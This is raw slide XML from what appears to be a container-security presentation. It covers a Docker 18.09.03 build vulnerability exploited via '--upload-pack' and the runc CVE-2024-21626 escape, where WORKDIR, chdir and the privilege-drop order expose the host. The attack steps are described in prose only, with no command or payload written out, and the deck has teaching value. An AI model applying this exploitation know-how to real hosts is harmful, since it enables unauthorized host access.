        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="781237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From the attack perspective, we saw that the docker build vulnerability can be exploited in docker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>18.09.03</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> version. If we see below, in the docker version we can run commands according to use in --upload-pack=” “ command. And we can run commands by using the vulnerability, like here is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> command we are successfully executing using docker build vulnerability. </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68</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="151672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Here, there is an error showing that it is an “invalid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>refspec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>”. So, this vulnerability has been fixed in the later versions of docker. If we use latest or after versions of 18.09.03, this vulnerability can not be exploitable anymore. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FD75B49A-8C3A-BC41-8749-BFCFF0E8E90A}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>69</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="676689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CVE-2024-21626 is a significant security issue identified in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>runc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> container runtime environment, which is a popular use for launching and managing containers on Linux systems. The attacker might exploit the issue to obtain unauthorized access to the host system and execute arbitrary code in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>containerised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> environments.</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71</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1193756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CVE-2024-21626 is a significant security issue identified in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>runc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> container runtime environment, which is a popular use for launching and managing containers on Linux systems. The attacker might exploit the issue to obtain unauthorized access to the host system and execute arbitrary code in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>containerised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> environments.</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72</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="89488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CVE-2024-21626 is a significant security issue identified in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>runc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> container runtime environment, which is a popular use for launching and managing containers on Linux systems. The attacker might exploit the issue to obtain unauthorized access to the host system and execute arbitrary code in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>containerised</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="0" i="0" u="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> environments.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3087707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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1410978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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1537840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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="859524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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="375912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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1121889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80</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="210832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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FD75B49A-8C3A-BC41-8749-BFCFF0E8E90A}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="416278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runc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> is a command line client for running applications packaged according to the Open Container Initiative (OCI) format and is a compliant implementation of the Open Container Initiative specification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t> (man runc)	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FD75B49A-8C3A-BC41-8749-BFCFF0E8E90A}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1370126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runc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> is a command line client for running applications packaged according to the Open Container Initiative (OCI) format and is a compliant implementation of the Open Container Initiative specification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t> (man runc)	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FD75B49A-8C3A-BC41-8749-BFCFF0E8E90A}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153435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runc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> is a command line client for running applications packaged according to the Open Container Initiative (OCI) format and is a compliant implementation of the Open Container Initiative specification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t> (man runc)	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FD75B49A-8C3A-BC41-8749-BFCFF0E8E90A}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="360045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runc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> is a command line client for running applications packaged according to the Open Container Initiative (OCI) format and is a compliant implementation of the Open Container Initiative specification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-SA"/>
              <a:t> (man runc)	</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FD75B49A-8C3A-BC41-8749-BFCFF0E8E90A}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="326841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1, 2, and 3, we can see the mounting and entering of our container’s root filesystem.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>At 4, we can see that our WORKDIR value is being checked, presumably to ensure that it is a present directory. We can validate this by passing an invalid value to our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>, re-running our setup, and observing the output being cut off as the process will bail at this point.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>At 5, we can see our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Finally, at 6, we can see the handing over of control to the process we designated as part of our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>Dockerfile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Something interesting is that privilege dropping, both </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> and Linux capabilities, occurs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1"/>
              <a:t>after </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>our </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" err="1"/>
              <a:t>chdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t> happens, tagged as P above.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>We need now to check if anything left that point to the host. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FD75B49A-8C3A-BC41-8749-BFCFF0E8E90A}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="825603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976D-9D17-C48F-E6FA-F61A32069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A"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECEC5170-4942-9E01-87E0-39FDB19D6D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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50D561C5-A2B2-4792-884C-D807ECB34389}"/>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80E82673-3D98-0D2D-9CAD-A42EF99DED74}"/>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BCD9F2EE-5DC1-1310-9C5E-1EDDC3396C0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1811294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C1B2A-BB4E-396F-2C9B-E6CDF745452D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>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3CB2FFE4-38BE-D477-89A5-1C99111692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C9A6DDDE-B124-2E07-D054-EFB7B7E9551A}"/>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11ABDE3F-225F-A82E-FFB8-B81427D52093}"/>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4A5B4516-D0CC-B202-CD91-9B642F57CC12}"/>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38873368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233269-8E04-70FC-32EC-C9431B8C97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A"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Vertical Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B406DE05-721E-6EBC-2F11-48AF4F8FFE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6A56D07C-A3CA-27BE-682C-023A6F1FA06B}"/>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B0799EF9-0CB4-50F6-057D-2B0C6383E446}"/>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A9693D96-FCC8-D5F0-19FC-8EF4503C38C8}"/>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152958695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D9D9-003E-AB26-0A9E-EB9544AE495D}"/>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46E98108-C23A-B358-6441-14F35A86D8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751A28B6-B78B-F0D1-82BA-703D7C563D79}"/>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D8AE85BC-F965-0E47-F16B-BA5B079D0617}"/>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14D2FA43-54CB-60CD-8B02-F8820F64427E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="153140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940C-A21E-2561-3482-C3AF0ED5CA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A"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1ED4A56B-7863-48D2-666D-F21ECDF286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07B6D-1A96-C09E-4ADF-DB52CF8A243E}"/>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8232391A-CAB5-7FAF-01D5-611575AF0A44}"/>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0FA91FF3-BF4D-488B-1533-4D2BE7D76B5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0907522C-281B-B84D-9D16-8693EEE2C7CE}" type="slidenum">
              <a:rPr lang="en-SA" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="387363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257D-806F-905E-02D0-6F56107EE46F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{830BACB3-AAB5-6007-12E9-80316FE22D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3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A2EAF5D-4691-3E6A-92C0-14C159406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Date Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24920960-2DC5-EE1E-1684-096567546EE0}"/>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6" name="Footer Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2620DA4-F7EF-5D82-1861-52DF43E06F42}"/>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AEDE5E89-E214-FF58-6E45-1DD75C6F7C4A}"/>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300500872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9680-A26B-E2B1-CEE2-5F52B8691135}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr lang="en-SA"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8EAC4CC-87D2-C5FB-0F0D-2730E83503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1A5FBC-3D0C-3423-B4A3-1F94A1916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5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58893634-BEAB-0EB1-C49E-59A229DBD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72331A-892D-7CAE-B576-AC1B7A20CD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7" name="Date Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
